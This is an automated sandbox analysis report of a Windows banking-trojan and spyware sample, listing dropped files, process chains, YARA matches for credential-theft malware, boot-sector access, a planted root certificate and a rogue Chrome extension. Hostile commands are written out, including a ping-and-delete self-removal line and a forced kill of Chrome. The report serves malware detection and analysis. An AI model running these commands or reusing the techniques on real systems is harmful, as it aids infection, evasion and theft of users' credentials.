Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: String function: 04E61320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: String function: 026E9F94 appears 49 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: String function: 6E627EA0 appears 41 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122E1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: String function: 0122EB60 appears 31 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: String function: 004067A9 appears 58 times
Source: h1GodtbhC8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.10000000.11.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01216E5E GetLastError,FormatMessageW,1_2_01216E5E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E621870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_6E621870
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6286A0 LoadResource,LockResource,SizeofResource,0_2_6E6286A0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEF28.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: sfxname1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: sfxstime1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCommand line argument: STARTDLG1_2_0122D42A
Source: h1GodtbhC8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h1GodtbhC8.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\1607186572092.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: h1GodtbhC8.exeVirustotal: Detection: 46%
Source: h1GodtbhC8.exeMetadefender: Detection: 16%
Source: h1GodtbhC8.exeReversingLabs: Detection: 64%
Source: 1E1C360C582DF797.exeString found in binary or memory: -StartTP
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile read: C:\Users\user\Desktop\h1GodtbhC8.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: unknownProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: h1GodtbhC8.exeStatic file information: File size 4671378 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: h1GodtbhC8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.826855048.00000000026F6000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source: Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000024.00000002.639458414.0000000000BDC000.00000002.00020000.sdmp
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeUnpacked PE file: 25.2.1E1C360C582DF797.exe.4750000.5.unpack
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_5371765Jump to behavior
Source: 1E1C360C582DF797.exe.4.drStatic PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exeStatic PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.drStatic PE information: real checksum: 0xe6954 should be:
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65F9A8 push ecx; ret 0_2_6E65F9BB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122E0E4 push eax; ret 1_2_0122E102
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EBA6 push ecx; ret 1_2_0122EBB9
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10010579 push ecx; ret 4_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DF034 push E8026DF0h; iretd 21_2_026DF039
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E8680 push eax; ret 21_2_026E869E
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E78B0 push eax; ret 21_2_026E78C4
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E78B0 push eax; ret 21_2_026E78EC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E9FCF push ecx; ret 21_2_026E9FDF
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E88D9A push ecx; ret 21_2_04E88DAD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8EB91 push ecx; ret 21_2_04E8EBA4
Source: initial sampleStatic PE information: section name: .text entropy: 6.82101260035
Source: initial sampleStatic PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_1001D370
Installs new ROOT certificatesShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile created: C:\Program Files (x86)\71eza90awf48\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeajeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.jsJump to behavior
